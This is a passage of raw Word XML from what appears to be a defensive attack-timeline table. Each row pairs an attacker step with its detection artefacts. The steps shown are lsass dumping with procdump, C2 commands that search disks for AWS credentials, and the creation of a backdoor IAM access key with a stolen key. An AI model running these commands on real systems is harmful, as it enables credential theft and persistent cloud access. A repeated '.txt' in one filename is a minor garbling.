                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00381E3D">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">This avoids running known malware like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00381E3D">
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:t>, reducing EDR risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1950CD79" w14:textId="35711242" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">File System </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Artefact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Creation of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>lsass.dmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>file</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (large size ~200MB) in a non-standard location (</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C:\Users\Public\</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>SIEM Failure:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> No alert for </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>procdump.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">execution combined with the </w:t>
            </w:r>
            <w:r w:rsidRPr="00347A09">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-ma</w:t>
            </w:r>
            <w:r w:rsidRPr="00347A09">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">argument targeting </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>lsass.exe</w:t>
            </w:r>
            <w:r w:rsidR="00794D0D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00DB1C6E">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB1C6E">
              <w:instrText xml:space="preserve"> HYPERLINK \l "third" </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB1C6E">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:id w:val="-2100551272"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtEndPr>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
              </w:sdtEndPr>
              <w:sdtContent>
                <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> CITATION Sco20 \l 1033 </w:instrText>
                </w:r>
                <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00C04F69">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:noProof/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> </w:t>
                </w:r>
                <w:r w:rsidR="00C04F69" w:rsidRPr="00C04F69">
                  <w:rPr>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:noProof/>
                    <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:t>[3]</w:t>
                </w:r>
                <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                    <w:sz w:val="20"/>
                    <w:szCs w:val="20"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="00DB1C6E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="74B1FF5B" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EC30A7" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>T+2:10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51132798" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Discovery (Lateral)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1083)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E2E382" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>C2 Command:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>search -f ".</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/credentials" -s C:\</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">shell </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>findstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> /s /i "AWS_ACCESS_KEY_ID" C:\*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="293EE4A5" w14:textId="1A03336E" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Searches local disks for hardcoded cloud secrets. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Found:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007609F0">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C:\Temp\keys.txt</w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">containing the </w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>SVC_AWS_SYNC</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>key pair.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CD64F6D" w14:textId="34AA036D" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>File Access Audit:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Auditing </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">often not enabled for temporary folders, meaning the access to </w:t>
            </w:r>
            <w:r w:rsidR="007609F0">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C:\Temp\keys.txt</w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00234B4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">is silent. </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t>The key</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> forensic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:t>artefact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>plaintext credentials</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> themselves.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="64FA4B5B" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B9E4283" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+2:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="316A908E" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Cloud Pivot Setup</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1098.004)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60385FE4" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>C2 Command:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">shell </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> configure set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws_access_key_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;STOLEN_KEY&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">followed by </w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">shell </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>iam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> create-access-key --user-name SVC_AWS_SYNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC39287" w14:textId="6D49204D" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Using the stolen key, the attacker generates a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>new, unmonitored access key</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>same</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> user. This acts as a persistent, secondary backdoor into the cloud</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="1798171004"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00624BF5" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
            </w:hyperlink>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D94A0B" w14:textId="21EF264B" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>CloudTrail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> Log:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>CreateAccessKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> API call originating from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP (192.168.1.50)</w:t>
            </w:r>
            <w:r>
              <w:t>. This should be a high-fidelity alert, as this action should only come from dedicated identity management systems or the DC</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="1645241753"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00C04F69">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00C04F69" w:rsidRPr="00C04F69">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00C04F69">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
            </w:hyperlink>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="78C9F820" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
